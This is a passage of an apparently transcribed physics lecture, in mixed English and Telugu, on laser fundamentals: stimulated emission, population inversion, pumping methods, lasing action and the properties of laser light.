The other one is different types of lasers which are studying in this semester, and the last one is applications of lasers in various fields. So first of all, what is meant by a laser? Laser is an acronym for an abbreviation, or its abbreviation is light amplification by stimulated emission of radiation. So the total laser stands for light amplification by stimulated emission of radiation. In this, there will be two processes mainly involved. One is light will be amplified, and the other one is the process which with the light will be amplified is called as stimulated emission. So now we are going to discuss all these topics one by one. First of all, the theoretical basis for this laser was given by the famous scientist Albert Einstein. He used the photon concept for explaining the photoelectric effect. Based on this photon effect only, the entire lasers was built up. So the laser was a consequence of wave particle duality. That means there will be two natures, one is the wave nature and the other one is the particle nature for the light. This is based upon the de Broglie concept, that is, every moving particle is always associated with a wave. Next, the first laser is initially called as maser. Maser means microwave amplification by stimulated emission of radiation. This was developed by the scientist named C.H. Townes in 1951. So in this device, Townes used the ammonia molecules and produced the maser, which is of having wavelength 1 centimeters. So by using this device, he amplified the microwaves. Next, the first laser was prepared by the scientist named Theodore Maiman in 1960. So he employed the ruby rod, which is surrounded by a helical xenon flash lamp, and generated a laser beam of wavelength 6943 nanometers, 694.3 nanometers. So what are the basic concepts of laser? There will be 5 concepts involved in this laser. The first one is absorption, the other one is spontaneous emission, the next one is stimulated emission, and the fourth one is population inversion, and the last one is lasing action. తెలుగులో అబ్జార్ప్షన్ని శోషణం అంటారు, స్పాంటేనియస్ ఎమిషన్ని స్వచ్ఛంద ఉద్గారం అంటారు, స్టిమ్యులేటెడ్ ఎమిషన్ని ఉత్తేజిత ఉద్గారం అంటారు, పాపులేషన్ ఇన్వర్షన్ని జనాభా విలోమం అంటారు, అదేవిధంగా లేజింగ్ యాక్షన్ని లేజింగ్ చర్య అంటారు. ఈ 5 చర్యల మీద లేజర్ మొత్తం నిర్మితమవుతుంది. అందులో ఒక్కొక్క దాని గురించి వివరంగా తెలుసుకుందాం. ఫస్ట్ వన్ ఈజ్ అబ్జార్ప్షన్. In this absorption process, according to electron structure, every atom consists of a centrally surround nucleus in which the positive charge and the entire mass of the atom is supposed to be concentrated. ప్రతి పరమాణులో మధ్యలో ధనావేశం మరియు మొత్తం పరమాణు యొక్క భారం మొత్తం కలిగిన ఒక ప్రాంతం ఉంటుంది. ఆ ప్రాంతాన్నే కేంద్రకం అంటారు. ఈ కేంద్రకం చుట్టూ వివిధ వృత్తాకార కక్షల్లో ఎలక్ట్రాన్లు పరిభ్రమిస్తూ ఉంటాయి. Around this nucleus, the electrons will be moving in different orbits. As long as the electron is moving in that orbit, the total energy of the electron remains constant, which is called as stationary orbit. ఎలక్ట్రాన్ కక్షలో తిరుగుతున్నంతసేపు దాని యొక్క మొత్తం శక్తి స్థిరంగా ఉంటుంది, కనుక ఆ కక్షల్ని స్థిర కక్షలు అంటారు. ఎలక్ట్రాన్ ఒక కక్ష నుంచి ఇంకొక కక్షకి సంక్రమణం జరిపినప్పుడు దాని శక్తిలో మార్పులు వస్తాయి. whenever the electron moves from one state to another state, there will be transitions, there will be changes in the energies. అయితే the highest filled electron orbit is called as its ground state. ఎలక్ట్రాన్లచే ఆవరించబడిన కక్షను, చివరి కక్షను దాని యొక్క భూస్థాయి అంటాము. భూస్థాయికి ఉన్న పైనున్న స్థాయిలో ఎటువంటి ఎలక్ట్రాన్లు ఉండవు, వాటిని ఉత్తేజిత శక్తి స్థాయిలు అంటాము. ద ఎనర్జీ స్టేట్స్ అబౌవ్ ద గ్రౌండ్ స్టేట్ ఆర్ ఆల్మోస్ట్ ఆల్ ఎంప్టీ అండ్ దెర్ విల్ బి నో ఎలక్ట్రాన్ ప్రెసెంట్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్స్ నార్మల్లీ. Now on absorption of energy, the electron moves to these excited states. ఎలక్ట్రాన్ శక్తిని శోషించుకున్నప్పుడు అది పైనున్న శక్తి స్థాయిలకి ఉత్తేజితం పొందుతుంది.
ఈ పక్కనున్న చిత్రపటంలో ఇన్ దిస్ ఫిగర్ వీ కెన్ క్లియర్లీ అబ్జర్వ్ దట్ out of the 6 colors that are emitting from the light source, the orange color is absorbed by the electron which is rotating around the nucleus. ఇందులో కనుక మనం పరిశీలించగలిగితే ఈ కేంద్రకం చుట్టూ తిరుగుతున్న ఎలక్ట్రాను దాని మీద పడుతున్న 6 కిరణాల్లో ఆరెంజ్ కలర్ని అది అబ్జార్బ్ చేసుకుని పైన సెకండ్ ఆర్బిట్లోకి ఎంటర్ అవుతుంది. కనుక ఆ అబ్జార్ప్షన్ స్పెక్ట్రంలో మనకి ఆరెంజ్ కలర్ అనేది కనబడదు. అయితే ఈ ఎలక్ట్రాను ఎగ్జైటెడ్ స్టేట్లో వెళ్ళినప్పుడు ఆ శక్తి శోషణం అనేది ఫోటాన్ల రూపంలో జరుగుతుంది. ఎలక్ట్రాను ఉత్తేజిత శక్తి స్థాయిలో కొంత సమయం మాత్రమే గడుపుతుంది. ఈ గడిపే సమయాన్ని దాని యొక్క జీవితకాలం అంటాము. ద టైమ్ స్పెండ్ బై ద ఎలక్ట్రాన్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్ ఈస్ కాల్డ్ యాజ్ ఇట్స్ లైఫ్ టైమ్. ఆ లైఫ్ టైం అనేది తీసుకున్న పరమాణువు మీద డిపెండ్ అవుతుంది. అంటే డిఫరెంట్ మెటీరియల్స్ విల్ బి హ్యావింగ్ డిఫరెంట్ లైఫ్ టైమ్స్. నెక్స్ట్ ఎమిషన్, రెండో ప్రాసెస్. ఎలక్ట్రాను హయ్యర్ ఎనర్జీ స్టేట్ నుంచి లోవర్ ఎనర్జీ స్టేట్కి వచ్చినప్పుడు అది అబ్జార్బ్ చేసుకున్న ఎనర్జీని మళ్ళా రిలీజ్ చేస్తుంది. ఆ రిలీజ్ అయిన ఎనర్జీ మనకి ఫోటాన్ రూపంలో బయటికి ఎమిట్ అవుతుంది. నెక్స్ట్ ఎమిషన్ విల్ బి ఆఫ్ 2 types. అందులో ఒకటి స్పాంటేనియస్ ఎమిషను, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్. అయితే ఈ అబ్జార్ప్షన్ ఎమిషన్ రెండు కూడా ఈ ఫిగర్లో మనం క్లియర్గా గమనించవచ్చు. ద ఎలక్ట్రాన్ అనేది ఇక్కడ రెండో ఆర్బిట్లో తిరుగుతుంది. దాని మీద పడుతున్న ఎల్లో కలర్ ఎనర్జీలో ఈ ఎలక్ట్రాన్ అనేది ఎనర్జీని అబ్జార్బ్ చేసుకోవడం వల్ల ఒక్కొక్క ఆర్బిట్ చేంజ్ అవుతూ ఆ చివరి ఆర్బిట్లోకి వస్తుంది. దీన్నే మనం శోషణ ప్రక్రియ అంటాము. అదేవిధంగా చివరనున్న ఆర్బిట్ నుంచి ఎలక్ట్రాను ఎనర్జీని రిలీజ్ చేసుకుంటూ కిందనున్న లోవర్ ఎనర్జీ ఆర్బిట్స్కి వస్తుంది. ఈ సమయంలో మనకి శక్తి అనేది ఫోటాన్ల రూపంలో బయటికి విడుదలవ్వడాన్ని క్లియర్గా గమనించవచ్చు. సో హియర్ రెడ్ కలర్ ఫోటాన్ విల్ బి ఎమిటెడ్, ఫస్ట్ వన్. నెక్స్ట్ వన్ ఈజ్ గ్రీన్ కలర్ అండ్ ద అదర్ వన్ ఈజ్ బ్లూ కలర్. సో 3 రకాల ఫోటాన్లు ఇక్కడ ఎలక్ట్రాన్ ట్రాన్సిషన్ వల్ల మనకి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ ఎమిషన్ ప్రాసెస్ అనేది 2 types. అందులో స్పాంటేనియస్ ఎమిషన్ ఒకటి, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్. స్పాంటేనియస్ ఎమిషన్లో ఏం జరుగుతుంది? స్పాంటేనియస్ ఎమిషన్ అనేది న్యాచురల్ ప్రాసెస్. అంటే ఎలక్ట్రాన్ దాన్నంతట అది కిందనున్న శక్తి స్థాయిలకు వస్తుంది, న్యాచురల్గా వస్తుంది. ఈ ప్రాసెస్లో ఎలక్ట్రాన్ లాస్ అయిన ఎనర్జీ ఒక సింగిల్ ఫోటాన్ రూపంలో ఎమిట్ అవుతుంది. అదేవిధంగా ఈ వెలువడిన ఫోటాన్కి ర్యాండమ్ డైరెక్షన్ ఉంటుంది, ర్యాండమ్ ఫేజ్ ఉంటుంది. దీని వాల్యూ ఇంత ఉంటుందని మనం ఖచ్చితంగా నిర్ధారించలేము. సేమ్ లెవెల్లో కొన్ని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాను దానంతటది కిందికి రాదు. అనగా అటువంటి స్టేట్స్లో ఎలక్ట్రాన్ గడిపే కాలం చాలా ఎక్కువగా ఉంటుంది. అంటే దాని లైఫ్ టైం అనేది ఆ స్టేట్స్లో చాలా ఎక్కువగా ఉంటుంది. అటువంటి స్టేట్స్ని మనం మెటాస్టేబుల్ స్టేట్స్ అంటాము. ఇక్కడికి వచ్చేసరికి ఇందులో మనం స్పాంటేనియస్ ఎమిషన్ని క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇది న్యూక్లియస్. ఈ న్యూక్లియస్ చుట్టూ ఫస్ట్ ఆర్బిట్ అనేది గ్రీన్ ఆర్బిట్. ఈ గ్రీన్ ఆర్బిట్ తర్వాత ఉన్న రెడ్ ఆర్బిట్ ఎగ్జైటెడ్ స్టేట్ ఆఫ్ ద ఎలక్ట్రాను, గ్రీన్ ఆర్బిట్ గ్రౌండ్ స్టేటు. ఎలక్ట్రాన్ అనేది ఈ రెడ్ ఆర్బిట్లో నుంచి అనగా ఎగ్జైటెడ్ స్టేట్లో నుంచి లోవర్ ఎనర్జీ స్టేట్కి వచ్చినప్పుడు ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ ఫోటాన్కి అనేది ర్యాండమ్ ఫేజ్ ఉంటుంది. అదేవిధంగా దాని యొక్క డైరెక్షన్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ స్టిమ్యులేటెడ్ ఎమిషన్. మెటాస్టేబుల్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాను దాన్నంతట అది కిందికి రాదు. అటువంటి ఎలక్ట్రాన్ కిందికి రావాలంటే దాని మీద ఏదో ఒక ఎక్స్టర్నల్ ఇన్ఫ్లుయెన్స్ పనిచేయాలి. ఆ ఎక్స్టర్నల్ ఇన్ఫ్లుయెన్స్ ఏంటి? ఎలక్ట్రాన్ మీద ఒక ఫోటాన్ అనేది కొలైడ్ అయినప్పుడు ఖచ్చితంగా ఎలక్ట్రాన్ అనేది లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. అది మనం ఈ ఫిగర్లో క్లియర్గా గమనించవచ్చు. S1 అనేది ఎగ్జైటెడ్ స్టేటు, S0 అనేది మనకి గ్రౌండ్ స్టేటు. S1 స్టేటు అనేది మెటాస్టేబుల్ స్టేట్. ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక పార్టికల్ లేదా ఎలక్ట్రాన్ అనేది కిందికి రావాలంటే దాని మీద hν ఎనర్జీ కలిగిన ఈ ఫోటాన్ అనేది ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాను ఎనర్జీని లాస్ అవుతూ కిందనున్న S0 స్టేట్కి వస్తుంది. అయితే ఈ లాస్ అయిన ఎనర్జీ ఒక ఫోటాన్ రూపంలో వస్తుంది. అయితే ఇక్కడికి వచ్చేసరికి ఏంటంటే కండిషను, ఈ ఎనర్జీ లాస్ అయినప్పుడు ఫోటాన్కి ఎంతైతే ఎనర్జీ అయితే ఉంటుందో, ఎంత ఫ్రీక్వెన్సీ ఉంటుందో, ఎంత వేవ్ లెంత్ అయితే ఉంటుందో, ఇన్సిడెంట్ ఫోటాన్కి కూడా సేమ్ ఫ్యాక్టర్స్ ఉండాలి. అనగా ఈ ప్రాసెస్లో మనకి 2 ఫోటాన్స్ వస్తాయి. ఈ ప్రాసెస్లో 2 ఫోటాన్స్ వస్తాయి. ఒక ఫోటాను దాని మీద ఇన్సిడెంట్ అవుతున్న ఫోటాను, ఇంకొకటి ఎనర్జీ లాస్ట్ బై ద ఎలక్ట్రాన్. సో ఈ 2 ఫోటాన్స్కి
ఒకే వేవ్ లెంత్ ఉంటుంది. నెక్స్ట్ బోత్ విల్ బీ ట్రావెలింగ్ ఇన్ సేమ్ డైరెక్షన్, రెండు ఒకే డైరెక్షన్లో ట్రావెల్ చేస్తాయి. అలాగే రెండింటి యొక్క ఫేజ్ అనేది ఈక్వల్గా ఉంటుంది. సో ఆ ప్రాసెస్ని మళ్ళీ ఇక్కడ మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇందులో ఫస్ట్ వన్, దిస్ ఈజ్ ద ఎలక్ట్రాన్ విచ్ ఈజ్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్ E1 అనే ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ బ్లూ కలర్లో ఉంది. అది సెకండ్ ఫిగర్లోకి వచ్చేసరికి ఆ ఎలక్ట్రాన్ మీద హెచ్న్యూ ఎనర్జీ కలిగిన ఒక రెడ్ కలర్ ఫోటాన్ ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాన్ ఎనర్జీని కోల్పోతూ కిందకు వస్తుంది. ఈ టోటల్ ప్రాసెస్లో 2 ఫోటాన్స్ అనేవి మనకి ఎమిట్ అవుతున్నాయి. సో బిఫోర్ కొలిషన్ ఎలక్ట్రాన్ ఎగ్జైటెడ్ స్టేట్లో ఉంటే, ఆఫ్టర్ కొలిషన్ ఎలక్ట్రాన్ గ్రౌండ్ స్టేట్కి వచ్చింది. కొలిషన్ తర్వాత మనకి 2 ఫోటాన్స్ అనేవి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ స్పాంటేనియస్ అండ్ స్టిమ్యులేటెడ్ ఎమిషన్స్, ఈ రెండు కూడా మనం ఈ ఫిగర్లో క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో ఇక్కడికి వచ్చేసరికి పైదాన్లో ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాను న్యాచురల్గా కిందకు వస్తుంది. ఈ సమయంలో ఎమిట్ అయిన ఫోటాన్కి ర్యాండమ్ డైరెక్షన్ ఉంటుంది. అదేవిధంగా ఫేజ్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ కిందనున్న స్టిమ్యులేటెడ్ ఎమిషన్ ఫిగర్లో చూస్తే ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్పై ఒక ఫోటాన్ ఇన్సిడెంట్ అయినప్పుడు ఈ ఫోటాన్తో ఈ ఎలక్ట్రాన్ కొలైడ్ అయ్యి కిందనున్న గ్రౌండ్ స్టేట్కి వస్తుంది. గ్రౌండ్ స్టేట్కి వచ్చినప్పుడు ఈ లాస్ అయిన ఎనర్జీ ఫస్ట్ ఫోటాన్ రూపంలో వస్తే రెండో ఫోటాను ఈ ఇన్సిడెంట్ ఫోటాన్కి అవుతుంది. కనుక రెండింటి మధ్య ఒకే డైరెక్షన్లో ఉంటాయి, రెండు సేమ్ వేవ్ లెంత్ కలిగి ఉంటాయి, అలాగే రెండు కూడా ఒకే ఫేజ్లో ఉంటాయి. దిస్ ప్రాసెస్ ఈజ్ ద స్టిమ్యులేటెడ్ ఎమిషన్. నెక్స్ట్ వన్ ఈజ్ పాపులేషన్ ఇన్వర్షన్. అయితే ఈ పాపులేషన్ ఇన్వర్షన్లో ఏం జరుగుతుంది? జనరల్గా మనకి ఎగ్జైటెడ్ స్టేట్లో ఎలక్ట్రాన్స్ నెంబర్ చాలా తక్కువగా ఉంటుంది. ఎందుకంటే మనం చెప్పుకున్నప్పుడే గ్రౌండ్ స్టేట్ గురించి చెప్పుకున్నాం. ఏంటి, హైయెస్ట్ ఫిల్డ్ ఆర్బిట్ అయితే ఏదైతే ఉందో దాన్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్పుకున్నాం. కనుక గ్రౌండ్ స్టేట్లో ఎక్కువ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ ఉంటాయి. ఫర్ ఎగ్జాంపుల్ ఇక్కడ 2 స్టేట్స్ తీసుకున్నా, ఒకటి E1 అండ్ ద అదర్ వన్ ఈజ్ E2. ఇందులో E1లో మనకి ఈ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంది. E2లో ఈ పార్టికల్స్ నెంబరు అస్సలు లేదు, లేదా 0 కింద చెప్పొచ్చు. అయితే ఇక్కడ పార్టికల్స్ అనేవి ఎక్కువగా ఈ స్టేట్లో ఉన్నాయి కాబట్టి ఈ స్టేట్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్తాం. నెక్స్ట్ E2లో ఎటువంటి పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ లేవు కనుక ఇది ఎగ్జైటెడ్ స్టేట్స్. జనరల్గా గ్రౌండ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంటుంది కంపేర్డ్ టు ద నెంబర్ ఆఫ్ పార్టికల్స్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్. అయితే అబ్జార్ప్షన్ ప్రాసెస్లో ఏమవుతుందంటే ఈ గ్రౌండ్ స్టేట్లో ఉన్న ఈ పార్టికల్స్ ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్ అయినటువంటి E2 స్టేట్లోకి వెళ్తాయి. ఫలితంగా ఈ ఎలక్ట్రాన్స్ లేదా పార్టికల్స్ యొక్క నెంబరు ఎగ్జైటెడ్ స్టేట్లో గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఈ ఫిగర్లో మనం గమనిస్తే ఫస్ట్ పార్టికల్ అనేది ఎగ్జైటెడ్ స్టేట్కి వెళ్ళింది. అదేవిధంగా మిగతా పార్టికల్స్ అన్నీ కూడా ఒకదాని తర్వాత ఒకటి ఎనర్జీని అబ్జార్బ్ చేసుకుంటూ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళాయి. సో ఏదో ఒక స్టేజ్లో ఎలక్ట్రాన్ అనేది మెటాస్టేబుల్ స్టేట్లోకి ఎంటర్ అవుతే ఆ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాను తిరిగి కిందకి రాదు. సో హైయర్ ఎనర్జీ స్టేట్ నుంచి మెటాస్టేబుల్ స్టేట్లోకి వెళ్ళిన ఎలక్ట్రాన్ కిందకి రాదు, కానీ మిగతా స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్ కిందకి వచ్చేస్తాయి. సో ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ కిందకి రాకపోవడం వల్ల అక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం జాగ్రత్తగా చూడగలిగితే ఈ కింద నుంచి ఎలక్ట్రాన్స్ అన్నీ ఈ స్టేట్కి వెళ్ళి ఈ స్టేట్ నుంచి ఈ కింద స్టేట్కి వచ్చాయి. ఈ కింద స్టేట్ మెటాస్టేబుల్ స్టేట్ కనుక ఇక్కడికి వెళ్ళిన ఎలక్ట్రాను దానంతటది కిందకి రాకపోవడం వల్ల ఇక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఏదో ఒకానొక సందర్భంలో మనకి ఈ ఎలక్ట్రాన్స్ యొక్క నెంబరు కిందనున్న గ్రౌండ్ స్టేట్ నెంబర్ కన్నా చాలా ఎక్కువగా ఉంటుంది. అంటే ఫస్ట్ వచ్చిన స్టేట్కి ఇది ఇన్వర్స్ స్టేట్ కాబట్టి దీన్ని మనం పాపులేషన్ ఇన్వర్షన్ అంటాము. సో తెలుగులో దీన్ని జనాభా విలోమము. ఈ ఫిగర్లో మనం క్లియర్ కట్గా ఈ స్టేట్స్ అన్నీ కూడా మనం క్లియర్ కట్గా అబ్జర్వ్ చేయొచ్చు. సో నెక్స్ట్ వన్ ఈజ్ పంపింగ్. అయితే మనకి లేజర్లో ఖచ్చితంగా ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వాలి అంటే పంపింగ్ ప్రాసెస్ అనేది జరగాలి. పంపింగ్ ప్రాసెస్ అంటే ఏంటి? పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడానికి మనకి కావాల్సిన మెకానిజంనే పంపింగ్ కింద చెప్పొచ్చు. అయితే పంపింగ్ అనేది ఎన్ని రకాలుగా ఉంటుంది? మనకు డిఫరెంట్ టైప్స్ ఆఫ్ పంపింగ్ మెకానిజమ్స్ మనకి డే టు డే లైఫ్లో ఉన్నాయి. అందులో ఫస్ట్ వన్ ఈజ్ ఆప్టికల్ పంపింగ్, రెండోది ఎలక్ట్రికల్ పంపింగ్, మూడోది కెమికల్ పంపింగ్, అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్. సో ఈ పంపింగ్ మెకానిజమ్స్లో జరిగే ప్రక్రియ ఏంటి? ఫస్ట్ ఆప్టికల్ పంపింగ్లో మనం గ్యాషియస్ డిశ్చార్జ్ కానీ లేదా ఫ్లాష్ ట్యూబ్స్ కానీ వాడతాము. ఎగ్జాంపుల్ మనకి ఉన్నది రుబిలైజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జెస్ ఉపయోగించి పంపింగ్ ప్రాసెస్ కనుక జరిపితే అది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం కింద వస్తుంది. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ థర్డ్ వన్ ఈజ్
కెమికల్ పంపింగ్, ఇందులో మనకి ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ని మనం వాడతాము. ఈ ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ వల్ల ఎమిట్ అయిన ఎనర్జీని ఈ పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్కి వెళ్తాయి. కనుక ఇక్కడ పంపింగ్ ప్రాసెస్కి వాడేది కెమికల్ రియాక్షన్స్. అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్. ఈ థర్మల్ పంపింగ్ మెకానిజంలో మనం హీట్ ఎనర్జీని ఉపయోగిస్తాము. హీట్ ఎనర్జీని ఉపయోగించడం వల్ల హై టెంపరేచర్స్ వస్తాయి. హై టెంపరేచర్స్ వల్ల ఆ హీట్ ఎనర్జీని పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్లోకి వెళ్తాయి. సో లాస్ట్ ప్రాసెస్ ఇన్ దిస్ లేజర్ ఫండమెంటల్స్ ఆర్ లేజింగ్ యాక్షన్. వాట్ ఈస్ మెన్ బై లేజింగ్ యాక్షన్? ఈ పంపింగ్ వల్ల మనకి పాపులేషన్ ఇన్వర్షన్ అనేది అచీవ్ అవుతుంది. ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడం వల్ల మనకి ఆటోమేటిక్గా స్పాంటేనియస్ ఎమిషన్ జరిగి ఒక పార్టికల్ దానంతట అది కిందకు వస్తుంది. కిందకు వచ్చినప్పుడు ఒక ఫోటాన్ రిలీజ్ అవుతుంది. ఈ ఫోటాన్ ఇంకొక పార్టికల్ని మెటాస్టేబుల్ స్టేట్లో ఉన్న ఇంకొక పార్టికల్ని స్టిమ్యులేట్ చేసి 2 ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఈ 2 ఫోటాన్స్ తర్వాత ఉన్న 2 మెటాస్టేబుల్ స్టేట్లో ఉన్న 2 పార్టికల్స్ మీద ఈ 2 ఫోటాన్స్ కొలైడ్ అయ్యి ఇంకొక 2 ఫోటాన్స్ని ఎమిట్ చేస్తాయి. ఫలితంగా మనకి ఈ ప్రాసెస్లో టోటల్ 4 ఫోటాన్స్ వస్తాయి. 2 ఫోటాన్స్ 2 పార్టికల్స్ మీద ఇన్సిడెంట్ అవ్వడం వల్ల ప్రతి ప్రాసెస్లో 2 ఫోటాన్స్ రావడం వల్ల 2 పార్టికల్స్ ఉన్నాయి కనుక 4 ఫోటాన్స్ ఎమిట్ అవుతాయి. ఈ ఫిగర్లో మనం క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు. ఇందులో రెడ్ కలర్లో ఉన్నవి ఎగ్జైటెడ్ యాటమ్స్. ఈ ఎగ్జైటెడ్ యాటమ్ మీద ఈ రెడ్ కలర్ యారో పడింది అంటే ఒక ఫోటాన్ ఇన్సిడెంట్ అయింది. ఈ ఫోటాన్ ఇన్సిడెంట్ అవ్వడం వల్ల ప్రతి కొలిజన్లో నుంచి కూడా మనకి 2 ఫోటాన్స్ వస్తున్నాయి. ఈ 2 ఫోటాన్స్ మిగతా యాటమ్స్ని స్టిమ్యులేట్ చేస్తున్నాయి. కనుక ఈ ప్రాసెస్ చైన్ రియాక్షన్. ఈ చైన్ రియాక్షన్ అలా కంటిన్యూ అవ్వడం వల్ల మనకి గ్రాడ్యువల్గా ఫోటాన్స్ నెంబర్ యొక్క పెరుగుతుంది. ఈ ఫోటాన్స్ నెంబర్ పెరగడం వల్ల అక్కడ లోపల ఉన్న ఫోటాన్ బీమ్ యొక్క ఎనర్జీ కూడా పెరుగుతుంది. ఎందుకంటే ఎనర్జీ ఈక్వల్స్ టు NH/nu. ఎప్పుడైతే N పెరిగిందో ఆటోమేటిక్గా E పెరుగుతుంది. ఎప్పుడైతే ఈ ఎనర్జీ లేదా ఇంటెన్సిటీ ఒక సఫిషియంట్ వాల్యూకి రీచ్ అయిన తర్వాత మనకి లేజర్ బీమ్ అనేది బయటికి ఎమిట్ అవుతుంది ఆ డివైస్ నుంచి. సో దిస్ ఈజ్ కాల్డ్ యాజ్ లేజింగ్ యాక్షన్. అయితే ఈ ఫిగర్లో మనం క్లియర్ కట్గా గమనించవచ్చు. సో ఫస్ట్ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ ఎమిట్ అవుతుంది. ఈ ఫోటాను నెక్స్ట్ పార్టికల్ని స్టిమ్యులేట్ చేయడం వల్ల 2 ఫోటాన్స్ వస్తాయి. ఈ 2 ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతూ ఆటోమేటిక్గా ఫోటాన్స్ నెంబర్ పెరగడం వల్ల హై ఎనర్జీ బీము ఈ సైడ్ నుంచి మనకి లేజర్ రూపంలో బయటకు వస్తుంది. ఇందులో కూడా మనం డిఫరెంట్ ఈ మొత్తం చదువుకున్న ప్రాసెస్లన్నీ చూడొచ్చు. సో దిస్ ఈజ్ ఎగ్జైటెడ్ స్టేట్స్ ఆఫ్ ద యాటమ్స్. ఈ ఎగ్జైటెడ్ స్టేట్స్లో నుంచి మనకి స్పాంటేనియస్ ఎమిషన్ వల్ల కొన్ని ఫోటాన్స్ వస్తాయి. ఈ స్పాంటేనియస్ ఎమిషన్ స్టిమ్యులేట్ ఎమిషన్ వల్ల మరికొన్ని ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఫైనల్గా ఈ ఫోటాన్స్ యొక్క నెంబర్ పెరగడం వల్ల లాస్ట్కి హై ఎనర్జీ ఫోటాన్ బీము ఈ రూపంలో మనకి బయటకు వస్తుంది. సో వాట్ ఆర్ ద ప్రాపర్టీస్ ఆఫ్ లేజర్? లేజర్కి డిఫరెంట్ ప్రాపర్టీస్ ఉన్నాయి. అందులో ఫస్ట్ ప్రాపర్టీ మోనోక్రోమిక్ ప్రాపర్టీ. మోనోక్రోమిక్ ప్రాపర్టీ ఏంటి? లేజర్కి సింగిల్ వేవ్ లెంత్ ఉంటుంది. రెండోది హైలీ కోహరెంట్, అంటే అందులో ఉన్న ఫోటాన్స్ అన్నీ కూడా ఒకే ఫేజ్లో ఉంటాయి. అయితే ఇక్కడ ఈ ఫిగర్లో కానీ మనం అబ్జర్వ్ చేయగలిగితే ఫస్ట్ది సన్లైట్. సన్లైట్ అనేది మనకందరికీ తెలిసిందే. ఇట్ ఈజ్ ఏ క్రోమాటిక్ లైట్ ఆర్ మల్టీ కలర్డ్ లైట్. ఇందులో 7 కలర్స్ ఉంటాయి. కాబట్టి ఇది సింగిల్ వేవ్ లెంత్ కాదు. మనం ఏం చెప్తామంటే దానికి రేంజ్ చెప్తాం. 4000 యాంగ్స్ట్రామ్స్ నుంచి 7500 యాంగ్స్ట్రామ్స్ ఈ సన్లైట్కి ఉంటుంది. రెండో దానికి వచ్చేసరికి దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద LED. ఇది మోనోక్రోమాటిక్ అయినప్పటికీ కూడా ఇందులో ఉన్న లైట్ వేవ్స్ అన్నిటికి కూడా ఫేజ్ అనేది ఈక్వల్గా ఉండదు. కాబట్టి ఫేజ్ ఈక్వల్గా ఉండదు కాబట్టి ఆ బీమ్ని మనం ఇన్కోహరెంట్ అంటాము. అయితే లాస్ట్ది దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద లేజర్ బీమ్. ఈ లేజర్ బీమ్ నుంచి వస్తున్న లైట్కి సేమ్ వేవ్ లెంత్ ఉంటూ అదేవిధంగా అన్నీ కూడా సేమ్ ఫేజ్లో ఉండడం వల్ల ఇది మోనోక్రోమాటిక్ యాజ్ వెల్ యాజ్ హైలీ కోహరెంట్. అండ్ another important property of this laser beam is high directionality. అంటే దీనికి యాంగులర్ స్ప్రెడ్ అనేది చాలా తక్కువగా 